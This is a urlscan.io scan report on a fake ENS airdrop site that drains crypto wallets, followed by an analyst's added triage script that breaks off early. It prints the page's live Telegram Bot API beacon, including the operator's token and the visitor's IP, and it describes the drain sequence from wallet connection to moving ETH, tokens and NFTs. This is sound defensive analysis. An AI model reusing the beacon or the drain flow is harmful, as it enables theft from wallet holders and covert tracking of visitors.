urlscan.io public scan: ensgiveaway-claim.com (185.149.120.87), flagged: Malicious Activity!

Submitted URL: http://ensgiveaway.com/
Effective URL: https://ensgiveaway-claim.com/
Submission: On November 08 via manual from IE — Scanned from DE

Summary

This website contacted 8 IPs in 5 countries across 8 domains to perform 15 HTTP transactions. The main IP is 185.149.120.87, located in Russian Federation and belongs to DDOS-GUARD, RU. The main domain is ensgiveaway-claim.com.
TLS certificate: issued by R3 (Let's Encrypt) on November 8th 2022, the same day the site was scanned, and valid for 3 months; a same-day certificate on a freshly registered look-alike domain is typical of phishing infrastructure.
This is the only time ensgiveaway-claim.com was scanned on urlscan.io!

urlscan.io Verdict: Potentially Malicious

Community Verdicts: Malicious (2 votes)

Domain & IP information

Requests  IP Address                 ASN (Autonomous System)
10        185.149.120.87             57724 (DDOS-GUARD)        (2 domains: ensgiveaway.com and ensgiveaway-claim.com)
1         2001:4de0:ac18::1:a:1a     20446 (STACKPATH-CDN)
2         2606:4700::6811:190e       13335 (CLOUDFLARENET)
1         2606:4700::6810:7baf       13335 (CLOUDFLARENET)
1         2a00:1450:4001:830::200a   15169 (GOOGLE)
1         3.220.57.224               14618 (AMAZON-AES)
1         2001:67c:4e8:f004::9       62041 (TELEGRAM)
Totals: 15 HTTP transactions, 8 IPs (the 10 on 185.149.120.87 include the two redirect hops).
Requests  Apex Domain             Subdomain (Cisco Umbrella Rank)     Transfer
8         ensgiveaway-claim.com   ensgiveaway-claim.com               90 KB
2         cloudflare.com          cdnjs.cloudflare.com (361)          240 KB
2         ensgiveaway.com         ensgiveaway.com                     469 B
1         telegram.org            api.telegram.org (27783)            732 B
1         ipify.org               api.ipify.org (2725)                247 B
1         googleapis.com          fonts.googleapis.com (118)          1 KB
1         unpkg.com               unpkg.com (1127)                    195 KB
1         jquery.com              code.jquery.com (959)               83 KB
Totals: 15 HTTP transactions, 8 apex domains.
Requests  Domain                  Requested by
8         ensgiveaway-claim.com   ensgiveaway-claim.com
2         cdnjs.cloudflare.com    ensgiveaway-claim.com
2         ensgiveaway.com         (2 redirects)
1         api.telegram.org        ensgiveaway-claim.com
1         api.ipify.org           ensgiveaway-claim.com
1         fonts.googleapis.com    ensgiveaway-claim.com
1         unpkg.com               ensgiveaway-claim.com
1         code.jquery.com         ensgiveaway-claim.com
Totals: 15 HTTP transactions, 8 domains.

This site contains links to these domains (all legitimate ENS properties, used as decoration to make the airdrop page look official):

Domain
claim.ens.domains
ens.mirror.xyz
twitter.com
discuss.ens.domains
chat.ens.domains
Subject                    Issuer                                            Validity                  Valid for
ensgiveaway-claim.com      R3                                                2022-11-08 to 2023-02-06  3 months
*.jquery.com               Sectigo RSA Domain Validation Secure Server CA    2022-08-03 to 2023-07-14  a year
sni.cloudflaressl.com      Cloudflare Inc ECC CA-3                           2022-08-03 to 2023-08-02  a year
upload.video.google.com    GTS CA 1C3                                        2022-10-17 to 2023-01-09  3 months
*.ipify.org                Sectigo RSA Domain Validation Secure Server CA    2022-02-07 to 2023-03-10  a year
api.telegram.org           Go Daddy Secure Certificate Authority - G2        2022-03-24 to 2023-04-25  a year

This page contains 1 frames:

Primary Page: https://ensgiveaway-claim.com/
Frame ID: B8AB281B8F36052A1BC6C21FC67C4B5C
Requests: 17 HTTP requests in this frame

Page Title

ENS Airdrop

Page URL History

  1. http://ensgiveaway.com/ HTTP 301
    https://ensgiveaway.com/ HTTP 302
    https://ensgiveaway-claim.com/ Page URL

Detected technologies

Axios (overall confidence: 100%), detected pattern:
  • /axios(@|/)([\d.]+)(?:/[a-z]+)?/axios(?:.min)?\.js

jQuery (overall confidence: 100%), detected patterns:
  • jquery[.-]([\d.]*\d)[^/]*\.js
  • jquery.*\.js(?:\?ver(?:sion)?=([\d.]+))?

Page Statistics

15 requests; 100% HTTPS; 71% IPv6; 8 domains; 8 subdomains; 8 IPs; 5 countries; 611 kB transferred; 2707 kB size; 0 cookies.

15 HTTP transactions

Each transaction below lists: Resource, Path, Size (decoded), Transferred (on the wire), Type/MIME-Type, then the General, header and security-header details.
Transaction 1: / (Primary Request)
  Path: ensgiveaway-claim.com/
  Redirect chain: http://ensgiveaway.com/ -> https://ensgiveaway.com/ -> https://ensgiveaway-claim.com/
  Size: 35 KB   Transferred: 35 KB   Type: Document
  Full URL: https://ensgiveaway-claim.com/
  Protocol: HTTP/1.1   Security: TLS 1.3, AES_256_GCM
  Server: 185.149.120.87, Russian Federation, ASN57724 (DDOS-GUARD, RU)   Reverse DNS: ddos-guard.net
  Software: Express (X-Powered-By; no Server header)
  Resource hash (SHA-256): 6b2e28e6b2a7d6854b4d9941af6b9e334d53007f5486a533f5098d2552286f7c

Request headers

Upgrade-Insecure-Requests
1
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.87 Safari/537.36
accept-language
de-DE,de;q=0.9

Response headers

Connection
keep-alive
Content-Length
36117
Content-Type
text/html; charset=utf-8
Date
Tue, 08 Nov 2022 14:46:42 GMT
ETag
W/"8d15-h09+XKmN+fNaPHcMN7OR+2mJ3mY"
Keep-Alive
timeout=5
X-Powered-By
Express

Redirect headers

Connection
keep-alive
Content-Length
120
Content-Type
text/html; charset=utf-8
Date
Tue, 08 Nov 2022 14:46:42 GMT
Keep-Alive
timeout=5
Location
https://ensgiveaway-claim.com/#airdrop
Vary
Accept
X-Powered-By
Express
Transaction 2: jquery-3.6.0.js
  Path: code.jquery.com/
  Size: 282 KB   Transferred: 83 KB   Type: Script
  Full URL: https://code.jquery.com/jquery-3.6.0.js
  Requested by: ensgiveaway-claim.com (https://ensgiveaway-claim.com/)
  Protocol: H2   Security: TLS 1.3, AES_128_GCM
  Server: 2001:4de0:ac18::1:a:1a, Netherlands, ASN20446 (STACKPATH-CDN, US)   Reverse DNS: none
  Software: nginx (Server header)
  Resource hash (SHA-256): 1fe2bb5390a75e5d61e72c107cab528fc3c29a837d69aab7d200e1dbb5dcd239

Request headers

Referer
https://ensgiveaway-claim.com/
Origin
https://ensgiveaway-claim.com
accept-language
de-DE,de;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.87 Safari/537.36

Response headers

date
Tue, 08 Nov 2022 14:46:43 GMT
content-encoding
gzip
last-modified
Fri, 20 Aug 2021 17:47:53 GMT
server
nginx
etag
W/"611feac9-46744"
vary
Accept-Encoding
x-hw
1667918803.dop115.am5.t,1667918803.cds261.am5.hn,1667918803.cds145.am5.c
content-type
application/javascript; charset=utf-8
access-control-allow-origin
*
cache-control
max-age=315360000, public
accept-ranges
bytes
content-length
84714
Transaction 3: modal.css
  Path: ensgiveaway-claim.com/assets/
  Size: 3 KB   Transferred: 3 KB   Type: Stylesheet
  Full URL: https://ensgiveaway-claim.com/assets/modal.css
  Requested by: ensgiveaway-claim.com (https://ensgiveaway-claim.com/)
  Protocol: HTTP/1.1   Security: TLS 1.3, AES_256_GCM
  Server: 185.149.120.87, Russian Federation, ASN57724 (DDOS-GUARD, RU)   Reverse DNS: ddos-guard.net
  Software: Express (X-Powered-By; no Server header)
  Resource hash (SHA-256): b1def6a0eb345eefeac579d793c93a50b4a805ca38ff3cfaa2928ab6a5665a68

Request headers

accept-language
de-DE,de;q=0.9
Referer
https://ensgiveaway-claim.com/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.87 Safari/537.36

Response headers

Date
Tue, 08 Nov 2022 14:46:43 GMT
Last-Modified
Thu, 03 Nov 2022 00:12:19 GMT
X-Powered-By
Express
ETag
W/"c51-1843ad4dab8"
Content-Type
text/css; charset=UTF-8
Cache-Control
public, max-age=0
Connection
keep-alive
Accept-Ranges
bytes
Keep-Alive
timeout=5
Content-Length
3153
Transaction 4: javascript_main.js
  Path: ensgiveaway-claim.com/assets/
  Size: 6 KB   Transferred: 6 KB   Type: Script
  Full URL: https://ensgiveaway-claim.com/assets/javascript_main.js
  Requested by: ensgiveaway-claim.com (https://ensgiveaway-claim.com/)
  Protocol: HTTP/1.1   Security: TLS 1.3, AES_256_GCM
  Server: 185.149.120.87, Russian Federation, ASN57724 (DDOS-GUARD, RU)   Reverse DNS: ddos-guard.net
  Software: Express (X-Powered-By; no Server header)
  Resource hash (SHA-256): 616d2737341241c576565fcea99632728fdd464cbac63330453212350ef9ca19

Request headers

accept-language
de-DE,de;q=0.9
Referer
https://ensgiveaway-claim.com/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.87 Safari/537.36

Response headers

Date
Tue, 08 Nov 2022 14:46:43 GMT
Last-Modified
Fri, 04 Nov 2022 14:33:10 GMT
X-Powered-By
Express
ETag
W/"1626-184430f5870"
Content-Type
application/javascript; charset=UTF-8
Cache-Control
public, max-age=0
Connection
keep-alive
Accept-Ranges
bytes
Keep-Alive
timeout=5
Content-Length
5670
Transaction 5: web3.min.js
  Path: cdnjs.cloudflare.com/ajax/libs/web3/3.0.0-rc.5/
  Size: 2 MB   Transferred: 231 KB   Type: Script
  Full URL: https://cdnjs.cloudflare.com/ajax/libs/web3/3.0.0-rc.5/web3.min.js
  Requested by: ensgiveaway-claim.com (https://ensgiveaway-claim.com/)
  Protocol: H2   Security: TLS 1.3, AES_128_GCM
  Server: 2606:4700::6811:190e, United States, ASN13335 (CLOUDFLARENET, US)   Reverse DNS: none
  Software: cloudflare (Server header)
  Resource hash (SHA-256): eaa566c7dddb8fb3085157f9f8ebb8879b41a1ec3904e7d49887d610c625c92e
  Security headers: Strict-Transport-Security: max-age=15780000; X-Content-Type-Options: nosniff

Request headers

accept-language
de-DE,de;q=0.9
Referer
https://ensgiveaway-claim.com/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.87 Safari/537.36

Response headers

date
Tue, 08 Nov 2022 14:46:43 GMT
content-encoding
br
x-content-type-options
nosniff
cf-cache-status
HIT
nel
{"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security
max-age=15780000
age
633367
cross-origin-resource-policy
cross-origin
alt-svc
h3=":443"; ma=86400, h3-29=":443"; ma=86400
content-length
235391
last-modified
Sat, 03 Jul 2021 01:30:45 GMT
server
cloudflare
cf-cdnjs-via
cfworker/kv
etag
"60dfbdc5-3977f"
vary
Accept-Encoding
report-to
{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NdMUwdE4TR6YF5ToWHCfqAxX3km5goISr1W%2BFYU41YoyRO6eGQiizwjhjdR%2B7U2QXqrvmIhTFC6nnHykHCWAIwSiFjt5J%2F%2BHo5yk45CcbqZe%2BbWVLjqQIhbIP1Q0vXwIAib4%2BYznMAFD%2FDTTJbPeUzxk"}],"group":"cf-nel","max_age":604800}
content-type
application/javascript; charset=utf-8
access-control-allow-origin
*
cache-control
public, max-age=30672000
accept-ranges
bytes
timing-allow-origin
*
cf-ray
766f19873f14bbe9-FRA
expires
Sun, 29 Oct 2023 14:46:43 GMT
Transaction 6: index.min.js (WalletConnect web3-provider)
  Path: unpkg.com/@walletconnect/web3-provider@1.7.1/dist/umd/
  Size: 733 KB   Transferred: 195 KB   Type: Script
  Full URL: https://unpkg.com/@walletconnect/web3-provider@1.7.1/dist/umd/index.min.js
  Requested by: ensgiveaway-claim.com (https://ensgiveaway-claim.com/)
  Protocol: H2   Security: TLS 1.3, AES_128_GCM
  Server: 2606:4700::6810:7baf, United States, ASN13335 (CLOUDFLARENET, US)   Reverse DNS: none
  Software: cloudflare (Server header)
  Resource hash (SHA-256): 249f824f34fd0715ba6210535decaab795ce238de0dcdf9ffb40a5d6b2ea0369
  Security headers: Strict-Transport-Security: max-age=31536000; includeSubDomains; preload; X-Content-Type-Options: nosniff

Request headers

accept-language
de-DE,de;q=0.9
Referer
https://ensgiveaway-claim.com/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.87 Safari/537.36

Response headers

date
Tue, 08 Nov 2022 14:46:43 GMT
via
1.1 fly.io
x-content-type-options
nosniff
cf-cache-status
HIT
content-encoding
br
strict-transport-security
max-age=31536000; includeSubDomains; preload
age
24821485
last-modified
Sat, 26 Oct 1985 08:15:00 GMT
fly-request-id
01FT83PQ9PHTXP6G65W8019AKC
server
cloudflare
etag
W/"b72ae-I2VpOtfGa9/GSavEcSax34GI2zI"
vary
Accept-Encoding
content-type
application/javascript; charset=utf-8
access-control-allow-origin
*
cache-control
public, max-age=31536000
cf-ray
766f19876c2abb97-FRA
Transaction 7: ERC20_abi.js
  Path: ensgiveaway-claim.com/assets/
  Size: 4 KB   Transferred: 4 KB   Type: Script
  Full URL: https://ensgiveaway-claim.com/assets/ERC20_abi.js
  Requested by: ensgiveaway-claim.com (https://ensgiveaway-claim.com/)
  Protocol: HTTP/1.1   Security: TLS 1.3, AES_256_GCM
  Server: 185.149.120.87, Russian Federation, ASN57724 (DDOS-GUARD, RU)   Reverse DNS: ddos-guard.net
  Software: Express (X-Powered-By; no Server header)
  Resource hash (SHA-256): 4f02151a607a8dbb3fa6a072004b866a46f454ded2fdc1dc5991007e1469b80d

Request headers

accept-language
de-DE,de;q=0.9
Referer
https://ensgiveaway-claim.com/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.87 Safari/537.36

Response headers

Date
Tue, 08 Nov 2022 14:46:43 GMT
Last-Modified
Sun, 30 Oct 2022 19:37:46 GMT
X-Powered-By
Express
ETag
W/"1086-1842a666b10"
Content-Type
application/javascript; charset=UTF-8
Cache-Control
public, max-age=0
Connection
keep-alive
Accept-Ranges
bytes
Keep-Alive
timeout=5
Content-Length
4230
Transaction 8: ERC721_abi.js
  Path: ensgiveaway-claim.com/assets/
  Size: 4 KB   Transferred: 4 KB   Type: Script
  Full URL: https://ensgiveaway-claim.com/assets/ERC721_abi.js
  Requested by: ensgiveaway-claim.com (https://ensgiveaway-claim.com/)
  Protocol: HTTP/1.1   Security: TLS 1.3, AES_256_GCM
  Server: 185.149.120.87, Russian Federation, ASN57724 (DDOS-GUARD, RU)   Reverse DNS: ddos-guard.net
  Software: Express (X-Powered-By; no Server header)
  Resource hash (SHA-256): d3ca2d2c3e7e99c5035173b6f33d32ade7cc5753c13b28d4118b7136fc3baa32

Request headers

accept-language
de-DE,de;q=0.9
Referer
https://ensgiveaway-claim.com/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.87 Safari/537.36

Response headers

Date
Tue, 08 Nov 2022 14:46:43 GMT
Last-Modified
Sun, 30 Oct 2022 19:37:47 GMT
X-Powered-By
Express
ETag
W/"f46-1842a666ef8"
Content-Type
application/javascript; charset=UTF-8
Cache-Control
public, max-age=0
Connection
keep-alive
Accept-Ranges
bytes
Keep-Alive
timeout=5
Content-Length
3910
Transaction 9: ERC1155_abi.js
  Path: ensgiveaway-claim.com/assets/
  Size: 5 KB   Transferred: 6 KB   Type: Script
  Full URL: https://ensgiveaway-claim.com/assets/ERC1155_abi.js
  Requested by: ensgiveaway-claim.com (https://ensgiveaway-claim.com/)
  Protocol: HTTP/1.1   Security: TLS 1.3, AES_256_GCM
  Server: 185.149.120.87, Russian Federation, ASN57724 (DDOS-GUARD, RU)   Reverse DNS: ddos-guard.net
  Software: Express (X-Powered-By; no Server header)
  Resource hash (SHA-256): dc0ebec5b637de73126525acd4bdf7e7e3790b26caea7cfcff90625ca8ccf7d1

Request headers

accept-language
de-DE,de;q=0.9
Referer
https://ensgiveaway-claim.com/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.87 Safari/537.36

Response headers

Date
Tue, 08 Nov 2022 14:46:43 GMT
Last-Modified
Sun, 30 Oct 2022 19:37:47 GMT
X-Powered-By
Express
ETag
W/"14fa-1842a666ef8"
Content-Type
application/javascript; charset=UTF-8
Cache-Control
public, max-age=0
Connection
keep-alive
Accept-Ranges
bytes
Keep-Alive
timeout=5
Content-Length
5370
Transaction 10: axios.min.js
  Path: cdnjs.cloudflare.com/ajax/libs/axios/1.1.3/
  Size: 26 KB   Transferred: 9 KB   Type: Script
  Full URL: https://cdnjs.cloudflare.com/ajax/libs/axios/1.1.3/axios.min.js
  Requested by: ensgiveaway-claim.com (https://ensgiveaway-claim.com/)
  Protocol: H2   Security: TLS 1.3, AES_128_GCM
  Server: 2606:4700::6811:190e, United States, ASN13335 (CLOUDFLARENET, US)   Reverse DNS: none
  Software: cloudflare (Server header)
  Resource hash (SHA-256): ba23bffc36efb30892b6cca21b76dbb4372852a40818abd1cd1e9f7df21bbecd
  Security headers: Strict-Transport-Security: max-age=15780000; X-Content-Type-Options: nosniff

Request headers

Referer
Origin
https://ensgiveaway-claim.com
accept-language
de-DE,de;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.87 Safari/537.36

Response headers

date
Tue, 08 Nov 2022 14:46:43 GMT
content-encoding
br
x-content-type-options
nosniff
cf-cache-status
HIT
nel
{"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security
max-age=15780000
age
507187
cross-origin-resource-policy
cross-origin
alt-svc
h3=":443"; ma=86400, h3-29=":443"; ma=86400
content-length
8949
last-modified
Sat, 15 Oct 2022 17:02:52 GMT
server
cloudflare
cf-cdnjs-via
cfworker/kv
etag
"634ae7bc-22f5"
vary
Accept-Encoding
report-to
{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HMlXHjE3QKM%2BoZrMWa18hTJ0IF7cxryiqo74vUaUA5Hz1kv0NvpgkKNp%2FFR3p4JFyESTNjPgvjI0cYGA03Rxp7QtEHrrNoEN0apVTg1mkphbYzk1rv3aa3nuNDa8qc%2BiR8lk5mEdZIJPgtegIijOFVIV"}],"group":"cf-nel","max_age":604800}
content-type
application/javascript; charset=utf-8
access-control-allow-origin
*
cache-control
public, max-age=30672000
accept-ranges
bytes
timing-allow-origin
*
cf-ray
766f19873b35914a-FRA
expires
Sun, 29 Oct 2023 14:46:43 GMT
Transaction 11: import_main.js
  Path: ensgiveaway-claim.com/assets/
  Size: 3 KB   Transferred: 4 KB   Type: Script
  Full URL: https://ensgiveaway-claim.com/assets/import_main.js
  Requested by: ensgiveaway-claim.com (https://ensgiveaway-claim.com/)
  Protocol: HTTP/1.1   Security: TLS 1.3, AES_256_GCM
  Server: 185.149.120.87, Russian Federation, ASN57724 (DDOS-GUARD, RU)   Reverse DNS: ddos-guard.net
  Software: Express (X-Powered-By; no Server header)
  Resource hash (SHA-256): 2db95cdfc19b90ce6ff474b4ad38be17d8b13e761ed02af7bbfe931f6d898e5b

Request headers

accept-language
de-DE,de;q=0.9
Referer
https://ensgiveaway-claim.com/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.87 Safari/537.36

Response headers

Date
Tue, 08 Nov 2022 14:46:43 GMT
Last-Modified
Sun, 06 Nov 2022 12:42:35 GMT
X-Powered-By
Express
ETag
W/"dc3-1844cf6d278"
Content-Type
application/javascript; charset=UTF-8
Cache-Control
public, max-age=0
Connection
keep-alive
Accept-Ranges
bytes
Keep-Alive
timeout=5
Content-Length
3523
Transaction 12: main.js (the script that later calls api.ipify.org and api.telegram.org)
  Path: ensgiveaway-claim.com/assets/
  Size: 27 KB   Transferred: 28 KB   Type: Script
  Full URL: https://ensgiveaway-claim.com/assets/main.js
  Requested by: ensgiveaway-claim.com (https://ensgiveaway-claim.com/)
  Protocol: HTTP/1.1   Security: TLS 1.3, AES_256_GCM
  Server: 185.149.120.87, Russian Federation, ASN57724 (DDOS-GUARD, RU)   Reverse DNS: ddos-guard.net
  Software: Express (X-Powered-By; no Server header)
  Resource hash (SHA-256): 6f2982e7236e094c6c01b4bf0e87505fa1ef9b809d6105e3f3e345353ef10cc2

Request headers

accept-language
de-DE,de;q=0.9
Referer
https://ensgiveaway-claim.com/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.87 Safari/537.36

Response headers

Date
Tue, 08 Nov 2022 14:46:43 GMT
Last-Modified
Mon, 07 Nov 2022 22:30:51 GMT
X-Powered-By
Express
ETag
W/"6d70-1845437c178"
Content-Type
application/javascript; charset=UTF-8
Cache-Control
public, max-age=0
Connection
keep-alive
Accept-Ranges
bytes
Keep-Alive
timeout=5
Content-Length
28016
Transaction 13: css2 (Google Fonts stylesheet, requested as a Font)
  Path: fonts.googleapis.com/
  Size: 2 KB   Transferred: 1 KB   Type: Font
  Full URL: https://fonts.googleapis.com/css2?family=Plus+Jakarta+Sans:wght@700&display=swap
  Requested by: ensgiveaway-claim.com (https://ensgiveaway-claim.com/)
  Protocol: H2   Security: TLS 1.3, AES_128_GCM
  Server: 2a00:1450:4001:830::200a, Frankfurt am Main, Germany, ASN15169 (GOOGLE, US)   Reverse DNS: none
  Software: ESF (Server header)
  Resource hash (SHA-256): 01f59f61b5ad9958b3c8dd09e29420692f21fb6e61c0e20cc4d23814f3f7206f
  Security headers: Strict-Transport-Security: max-age=31536000; X-Content-Type-Options: nosniff; X-Frame-Options: SAMEORIGIN; X-Xss-Protection: 0

Request headers

Referer
https://ensgiveaway-claim.com/
Origin
https://ensgiveaway-claim.com
accept-language
de-DE,de;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.87 Safari/537.36

Response headers

strict-transport-security
max-age=31536000
date
Tue, 08 Nov 2022 14:46:43 GMT
content-encoding
gzip
x-content-type-options
nosniff
cross-origin-resource-policy
cross-origin
alt-svc
h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
x-xss-protection
0
last-modified
Tue, 08 Nov 2022 14:46:43 GMT
server
ESF
cross-origin-opener-policy
same-origin-allow-popups
x-frame-options
SAMEORIGIN
content-type
text/css; charset=utf-8
access-control-allow-origin
*
cache-control
private, max-age=86400, stale-while-revalidate=604800
timing-allow-origin
*
link
<https://fonts.gstatic.com>; rel=preconnect; crossorigin
expires
Tue, 08 Nov 2022 14:46:43 GMT
Transaction 14: inline data: URI (truncated by urlscan)
  Path: /
  Size: 4 KB   Transferred: 0   Type: Image
  Full URL: data:truncated
  Protocol: DATA   Server: none   Reverse DNS: none   Software: none
  Resource hash (SHA-256): c64e9c818d03878f82b48c2e2778935a1acb3b867e31b1473e19e856cde37b6e

Request headers

accept-language
de-DE,de;q=0.9
Referer
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.87 Safari/537.36

Response headers

Content-Type
image/svg+xml
Transaction 15: inline data: URI (truncated by urlscan)
  Path: /
  Size: 2 KB   Transferred: 0   Type: Image
  Full URL: data:truncated
  Protocol: DATA   Server: none   Reverse DNS: none   Software: none
  Resource hash (SHA-256): 4d17514e4c6ec3082d1321979a48ca6975a2fa1682a8e633a320fcff5e1a67c2

Request headers

accept-language
de-DE,de;q=0.9
Referer
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.87 Safari/537.36

Response headers

Content-Type
image/svg+xml
Transaction 16: / (public-IP lookup)
  Path: api.ipify.org/
  Size: 15 B   Transferred: 247 B   Type: Fetch
  Full URL: https://api.ipify.org/
  Requested by: ensgiveaway-claim.com (https://ensgiveaway-claim.com/assets/main.js)
  Protocol: HTTP/1.1   Security: TLS 1.3, AES_128_GCM
  Server: 3.220.57.224, Ashburn, United States, ASN14618 (AMAZON-AES, US)   Reverse DNS: ec2-3-220-57-224.compute-1.amazonaws.com
  Software: Cowboy (Server header)
  Resource hash (SHA-256): e5be170a8935eecfcdf2d0a98457dcaa8354bf54e7de1bc20a913c685087fdb8

Request headers

accept-language
de-DE,de;q=0.9
Referer
https://ensgiveaway-claim.com/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.87 Safari/537.36

Response headers

Date
Tue, 08 Nov 2022 14:46:43 GMT
Via
1.1 vegur
Server
Cowboy
Vary
Origin
Content-Type
text/plain
Access-Control-Allow-Origin
https://ensgiveaway-claim.com
Connection
keep-alive
Content-Length
15
Transaction 17: sendMessage (Telegram Bot API beacon)
  Path: api.telegram.org/bot5755492923:AAFpSok6EgmPbC3OXnCSnRMbFDGMiaPpT64/
  Size: 485 B   Transferred: 732 B   Type: Fetch
  Full URL: https://api.telegram.org/bot5755492923:AAFpSok6EgmPbC3OXnCSnRMbFDGMiaPpT64/sendMessage?chat_id=-855472091&parse_mode=markdown&text=%F0%9F%92%A0%20%D0%9F%D0%BE%D0%BB%D1%8C%D0%B7%D0%BE%D0%B2%D0%B0%D1%82%D0%B5%D0%BB%D1%8C%20185.213.155.176%20%D0%B7%D0%B0%D1%88%D0%B5%D0%BB%20%D0%BD%D0%B0%20%D1%81%D0%B0%D0%B9%D1%82
  Decoded text parameter: 💠 Пользователь 185.213.155.176 зашел на сайт (Russian for "User 185.213.155.176 visited the site"). The address is the visitor's own public IP: the api.ipify.org response just above is exactly 15 bytes, the length of that dotted quad, and both calls were issued by main.js. Because the request is made from the browser, the URL also hands every visitor the operator's bot token and the chat_id (-855472091) the beacons go to.
  Requested by: ensgiveaway-claim.com (https://ensgiveaway-claim.com/assets/main.js)
  Protocol: H2   Security: TLS 1.3, AES_256_GCM
  Server: 2001:67c:4e8:f004::9, Virgin Islands (British), ASN62041 (TELEGRAM, VG)   Reverse DNS: none
  Software: nginx/1.18.0 (Server header)
  Resource hash (SHA-256): daa6ac040a868f904cb1d84b65d47940ee44ef64f1e0cc154f266875ee56129e
  Security headers: Strict-Transport-Security: max-age=31536000; includeSubDomains; preload

Request headers

accept-language
de-DE,de;q=0.9
Referer
https://ensgiveaway-claim.com/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.87 Safari/537.36

Response headers

date
Tue, 08 Nov 2022 14:46:43 GMT
strict-transport-security
max-age=31536000; includeSubDomains; preload
server
nginx/1.18.0
access-control-allow-methods
GET, POST, OPTIONS
content-type
application/json
access-control-allow-origin
*
access-control-expose-headers
Content-Length,Content-Type,Date,Server,Connection
content-length
485

Verdicts & Comments


Verdict: Malicious (scope: page.url)
Submitted on November 9th 2022, 2:22:52 pm UTC, from Ireland

Threats: Phishing Scam Social Engineering
Comment: One website part of a large token scam operation. It will drain your tokens from your wallet if you connect to it. https://etherscan.io/address/0x2b22D1256FbFfed294c83624c08A79D63BE13A12

Potentially malicious activity detected
Disclaimer: These verdicts should be used to detect potentially malicious websites, not as a final verdict!

63 JavaScript Global Variables

These are the non-standard "global" variables defined on the window object. These can be helpful in identifying possible client-side frameworks and code.

Grouped by what the names reveal (types as reported by urlscan):

Chrome built-ins that urlscan lists as non-standard (9): object onbeforeinput, object oncontextlost, object oncontextrestored, function structuredClone, object launchQueue, object onbeforematch, function getScreenDetails, function queryLocalFonts, object navigation

Third-party libraries loaded by the page (11): function $, function jQuery, function setImmediate, function clearImmediate, object regeneratorRuntime, function Web3, object WalletConnectProvider, function axios, object ERC20_ABI, object ERC721_ABI, object ERC1155_ABI

Obfuscator helper functions (6): _0x4364, _0x364b, _0x1a38, _0x12c6, _0x1083, _0x4428

Drainer state and configuration (18): object modal, string logLanguage, string ownerAddress, string MORALIS_KEY, string ZAPPER_KEY, number autoMetamaskConnect, number connected, object nativePrices, object tgMsgCount, object ZAPPER_MATCH, object NATIVE_MATCH, object CHAIN_ID, object MORALIS_MATCH, object itemList, string account, string id, object response, object resp

Drainer logic (19 functions): mobileAndTabletCheck, getMobileOperatingSystem, updateState, connectMetamask, connectWalletConnect, fetchUserTokens, fetchSomething, getMoralisTokenBalances, getTokenBalances, getBSCTokenPrice, getETHTokenPrice, sendEth, sendToken, sendNFT, drain, connectAndDrain, connectAndDrainWalletConnect, logTx, sendMsg

Read together, the names lay out the flow: connect the victim's wallet (MetaMask or WalletConnect), enumerate its holdings through the Moralis and Zapper API keys embedded in the page, price them, then move ETH, ERC-20 tokens and NFTs (presumably to ownerAddress) through sendEth, sendToken and sendNFT under drain. logTx and sendMsg report back over Telegram; the sendMessage beacon above, issued by main.js, is that channel firing on page load.
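A triage helper for scans like this one, added here as an example (it is not code from urlscan.io or from the site). Its inputs are constructed inline from this report: the request list (requesting script, URL, response Content-Length) and an excerpt of the global-variable dump above. It parses the Telegram Bot API call into token, method, chat_id and decoded text, ties the IP in that text back to the api.ipify.org lookup by comparing the 15-byte response length with the address length, notes which wallet libraries were loaded, and flags drainer-style and obfuscator-style global names. The IP-echo host list, the library markers and the keyword list are assumed starter values, not anything the report states.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed from the scan above: (requesting URL, requested URL,
# response Content-Length, or None where the report shows none).
REQUESTS = [
    ("https://ensgiveaway-claim.com/",
     "https://cdnjs.cloudflare.com/ajax/libs/web3/3.0.0-rc.5/web3.min.js", 235391),
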